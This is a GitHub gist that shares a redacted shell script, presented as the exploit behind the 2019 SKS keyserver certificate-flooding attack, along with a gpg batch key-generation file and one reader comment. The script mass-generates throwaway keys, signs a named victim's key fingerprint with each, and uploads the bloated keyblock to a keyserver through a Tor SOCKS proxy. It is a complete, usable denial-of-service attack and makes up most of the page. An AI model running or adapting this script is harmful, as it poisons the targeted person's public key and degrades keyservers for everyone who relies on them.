Skip to content

Instantly share code, notes, and snippets.

@alpakido
Last active Dec 13, 2020
Embed
What would you like to do?
Redacted SKS exploit that was sent to me by attacker behind https://news.ycombinator.com/item?id=20312826
for _ in {1..500}; do
for _ in {1..100}; do
gpg --gen-key --batch keygen
gpg --quick-sign-key -u Marc EC18257DB21746FC711054BEB19C61D61333360C
rm ~/.gnupg/private-keys-v1.d/*.key
done
rm ~/.gnupg/openpgp-revocs.d/*.rev
gpg -a --export > ~/Desktop/keyblock.asc
rm ~/.gnupg/pub*
rm ~/.gnupg/tofu.db
rm ~/.gnupg/trustdb.gpg
rm -r ~/.gnupg/openpgp-revocs.d
rm -r ~/.gnupg/private-keys-v1.d
mkdir ~/.gnupg/private-keys-v1.d
gpg --import ~/Desktop/yt.asc
curl \
--socks5-hostname localhost:9050 \
--data-urlencode "keytext@keyblock.asc" \
--max-time 60 \
example.com:11371/pks/add
rm ~/Desktop/keyblock.asc
done
Key-Type: default
Subkey-Type: default
Name-Real: Marc Horowitz
Name-Comment: Yegor, you did a great SKS research job so far! Hope you are well! May the best team win! :-)
Name-Email: marc@mit.edu
Expire-Date: 0
%no-protection
%commit
@lambdafu

This comment has been minimized.

Copy link

@lambdafu lambdafu commented Jul 5, 2019

It seems the main difficulty in this attack is preventing GnuPG from DoS'ing itself, so the home directory has to be purged frequently. Thanks for sharing this, it illustrates that no sophisticated tool like trollwot was necessary for the attack.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment